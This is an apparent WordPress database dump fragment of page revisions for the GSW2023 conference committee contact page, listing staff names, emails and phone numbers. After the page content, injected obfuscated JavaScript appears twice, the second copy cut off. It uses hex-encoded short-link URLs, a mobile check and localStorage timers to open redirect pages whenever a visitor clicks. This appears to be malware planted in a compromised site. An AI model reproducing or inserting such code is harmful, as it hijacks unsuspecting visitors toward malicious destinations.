Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-30 12:44:47','2023-06-30 12:44:47','',4849,'https://gsw2023.com/?p=4968',0,'revision','',0),
(4969,4,'2023-06-30 12:45:33','2023-06-30 12:45:33','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Web Director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 